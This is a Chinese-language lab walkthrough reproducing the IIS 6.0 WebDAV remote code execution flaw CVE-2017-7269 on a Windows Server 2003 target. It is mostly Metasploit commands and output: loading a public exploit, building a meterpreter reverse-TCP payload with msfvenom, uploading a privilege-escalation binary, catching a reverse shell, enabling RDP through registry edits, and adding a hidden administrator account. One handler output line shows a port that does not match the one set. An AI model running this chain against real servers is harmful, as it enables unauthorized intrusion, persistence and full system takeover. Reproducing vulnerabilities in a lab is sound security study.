IIS6.0远程代码执行漏洞复现(CVE-2017-7269)

提权文件下载:点此下载
靶机：Windows server 2003 r2
EXP：https://github.com/zcgonvh/cve-2017-7269
把EXP导入Metasploit

启动MSF

尝试加载攻击模块
发现找不到该模块，这是因为msf不识别-，把-改为下划线就好了

重新启动程序

成功加载攻击模块

查看需要设置的参数

设置参数

加载攻击载荷

开始攻击

攻击成功

生成payload

aaa@qq.com:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.136 LPORT=6666 -f exe -o system.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: system.exe

尝试提权
测试得知根目录具有写权限

上传提权文件

meterpreter > upload "/root/pr.exe" c:\\shell
[*] uploading  : /root/pr.exe -> c:\shell
[*] uploaded   : /root/pr.exe -> c:\shell\pr.exe
meterpreter > upload "/root/system.exe" c:\\shell
[*] uploading  : /root/system.exe -> c:\shell
[*] uploaded   : /root/system.exe -> c:\shell\system.exe
meterpreter >

开启一个msfconsole并进入监听状态

sf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.52.136
lhost => 192.168.52.136
msf5 exploit(multi/handler) > set lport 6666
lport => 6988
msf5 exploit(multi/handler) > exploit 

执行提权程序

成功获取到一个shell

得到最高权限

使用以下命令开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

使用netstat -an查看是否开启

添加管理员账号

C:\shell>pr.exe "net user hack !123 /add"
pr.exe "net user hack !123 /add"
/xxoo/-->Build&&Change By p 
/xxoo/-->This exploit gives you a Local System shell 
/xxoo/-->Got WMI process Pid: 1796 
begin to try
/xxoo/-->Found token SYSTEM 
/xxoo/-->Command:net user hack !123 /add

添加到管理组

C:\shell>pr.exe "net localgroup administrators hack /add"
pr.exe "net localgroup administrators hack /add"
/xxoo/-->Build&&Change By p 
/xxoo/-->This exploit gives you a Local System shell 
/xxoo/-->Got WMI process Pid: 1796 
begin to try
/xxoo/-->Found token SYSTEM 
/xxoo/-->Command:net localgroup administrators hack /add
命令成功完成。

启动远程桌面连接